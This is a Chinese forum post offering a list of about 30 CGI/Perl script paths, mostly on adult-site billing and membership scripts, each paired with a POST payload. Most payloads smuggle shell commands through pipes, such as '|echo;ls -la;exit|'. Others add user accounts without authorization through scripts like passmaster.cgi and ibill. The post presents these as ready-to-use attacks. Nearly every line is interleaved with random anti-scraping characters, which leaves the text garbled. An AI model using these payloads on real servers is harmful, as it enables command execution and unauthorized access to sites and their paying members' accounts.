找回密码
 立即注册
查看: 3501|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
4 H# G! X- R( q! E% F; Q
& X& N# i, j" e  ?" T/smspass.pl1 C' x9 k! d$ n1 o- a
username=username&password=password0 f- S/ X% |7 O) _& J# k& u

( k6 n2 w1 ?6 K/index.cgi; u9 h  b% D: O7 K9 a) ]! y
wei=ren&gen=command& u) [" O1 Q  M" ~
+ k; L7 g1 U' C3 }" V
/passmaster.cgi
/ o  g# j+ F9 k: \, Q: @2 RAction=Add&Username=Username&Password=Password  o% R, g6 [$ S' c, z0 h5 d

7 ]2 b9 j0 E1 o7 E( o3 [0 D/accountcreate.cgi) F5 K5 B* H) z( a: e+ f
username=username&password=password&ref1=|echo;ls|
( V$ ~( O) C( ^1 l* ^- z" g' E6 k6 @. s8 i$ b
/form.cgi: ^- x7 B0 B! z3 v, k' g
name=xxxx&email=email&subject=xxxx&response=|echo;ls|  t" |( ?/ \$ H  z. V

( F, J! Z1 g2 Y& G/addusr.pl4 O5 k2 s% a+ J  k
/cgi-bin/EuroDebit/addusr.pl6 {  n* K/ [( H' r0 `7 D. U, p
user=username&pass=Password&confirm=Password" ]# f3 u# @. `7 C$ h

& a. [& X& C! t- ?5 n/ccbill-local.asp: t( K* u4 Z3 f& q' T; o7 G
post_values=username:password) j  V: m, ~& A) K
- [- Y3 ]! L* n/ [( L7 z% u( u5 K. q
/count.cgi
5 x2 F, y( ^  }0 L" dpinfile=|echo;ls -la;exit|& m  p3 x( l, S. O; |9 W

/ I3 T% T; E- K% V6 U" @- u/recon.cgi
! B! M. ~  C  _- }& E/recon.cgi?search/ T6 C7 K( x, X2 c
searchoption=1&searchfor=|echo;ls -al;exit|
3 Y! m( F( @0 P9 }5 Y6 C! e. W3 r6 |' d$ W3 ^0 _1 C( ~
/verotelrum.pl7 h( ]' U( s6 U6 @4 o1 u$ o- }/ d$ e
vercode=username:password:dseegsow:add:amount<&30>
$ S+ |, \) t/ }+ \4 N
3 q7 J- S) V/ O5 ^1 L- v' t5 J6 N/af.cgi
$ l- J, c* f: G; _1 m3 }_browser_out=|echo;ls -la;exit;|
0 J& ^$ N( e  X& u) J  y* l' C0 \( c( U
/modify.cgi
9 x- n/ x$ S) x8 V( e; v/ i/ lusername=username&password=password&expire=308 U' I0 C  F+ M: o5 S  u" W

8 Q0 U& C% ?7 |/openjournal.cgi. j3 o/ o9 b' Q# G" ?" [
edit=1&ct=2&go=|echo;ls -al;exit|
( t! D8 o: T7 y( U2 I, D. j7 F& n+ N0 w" b  M7 R
/gx9passwd.cgi
- }; @3 B" y# K( ?1 m( u! Ecmd=ADD&user=username&pass=password+ X( s. x6 O' v( w# S( N0 V1 d6 [

" s" n& ~3 B( y# B/probecontrol.cgi: Q' x9 @" w$ v! d# O9 b
command=enable&username=username&password=password  n# X8 @+ o3 V; c& v: a0 e
# B& S$ t( ?$ W% t3 @( j0 M
/recon.cgi
* N$ j' R& X# U2 a$ F* Y. S; bsearchoption=3&searchfor=echo;ls -la;exit, v! u+ Q: E4 w8 O9 C4 w. _. E

" n5 z3 G: |) ^* B2 `0 b8 a, T/htadd.pl
" O! v7 ?2 z! _, t/ y4 vconfigfile=|echo; ls -alt; exit
) [7 s1 }1 v  \8 @$ Q# {  ?- W  r- a7 F
/gx9passwd.cgi' P8 o6 \0 x& h  O
cmd=ADD&user=username&pass=password* @, v5 T- I! ]! v& D
! D/ o9 k( a) w' X6 F/ b
/ibill*.pl+ `' R+ B& R6 w# _8 x. G
reqtype=add&authpwd=authpwd&username=username&password=password
" c( k. A, q7 w/ A. r% \, i
" F) S" ]8 N6 Q( A2 m( b3 c/cpay.cgi
; a5 f# a- v( t( W. [' y: bcommand=add_member&username=username(EMAIL)&password=password(DES)
* l. q! }% h: u- s4 A5 q3 v5 e6 U) f
+ j/ F3 Z+ Q/ f/ b, m8 x/globill_ut.cgi$ L0 q! N( U% d0 U- \' B
do=add&username=username&password=password&wpassword=password: X) T7 P5 q/ Q# k7 Z

6 G6 I* _$ i0 L/usercontrol.cgi
& t; K7 c7 I- u  v: Q  wcommand=enable&username=USER&password=PASS+ D/ o3 v/ Y* Y
3 j7 ?  |  G$ l9 l. a0 x/ L/ p
/globoSALErum.cgi% w7 O( ~  i! l8 @; B3 `
action=ADD&seccode=seccode&login=username&password=password. t8 t9 _/ Z) E. s/ Q8 v- D, d% F

5 w2 Z; Q0 V6 J% a/ _2 u/addusr.pl9 b) A6 e5 w) Z) t3 ]' _
user=USER&pass=PASS&confirm=PASS' E8 ^4 t0 s0 {8 x

4 r9 i; I3 x& ^: |+ Q/pincount.cgi
( T5 h! ~& d% ^8 f/cgi-bin/mastergate/pincount.cgi+ L9 A/ |, ~3 E. _
pinfile=|echo;pwd;exit|) Y: L" ]( S* {
' s6 a3 W; b5 D; }, j
/accountcreate.cgi3 r& W) J0 x/ b( l$ Y3 @3 ]1 D
/cgi-bin/gateway/accountcreate.cgi
: A! ^9 m* q- R7 W' I- Kusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
. Z. k; {- d* ~. R5 W7 t3 v& D8 A7 @$ V) S2 E
/af.cgi
) ]- V7 v) r5 t0 r2 \1 C' A/env.cgi& I. }* }& k/ x+ }
ADD+;echo;pwd;exit
# {6 Z- \2 |! _5 a4 A
% y4 _; y* w8 H# r- I. g/count.cgi3 z% U& U7 w6 F5 R4 h+ G& M, c
pinfile=|echo;pwd;exit|
; W# j8 A; x' {/ e, P; p+ V" n$ e' m( n9 w! y$ V
/recon.cgi
' V$ q- o5 _& X- h* ]5 Usearchoption=1&searchfor=|echo;ls%20-al;exit|
# y5 L: C' m6 Q& ?; T# e3 B
6 d" L6 G0 B( T  f# O# B5 U/add.cgi
; y* |  f4 Z& V' Q: {( T$ K: K# }: V6 m; Iusername=username&password=password&expire=30
3 i" I7 d- I# a+ K# I5 H
1 A5 \. o3 P) k6 c+ P( E==============================
3 s# F& i+ |) _2 H) [& r: Y, Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表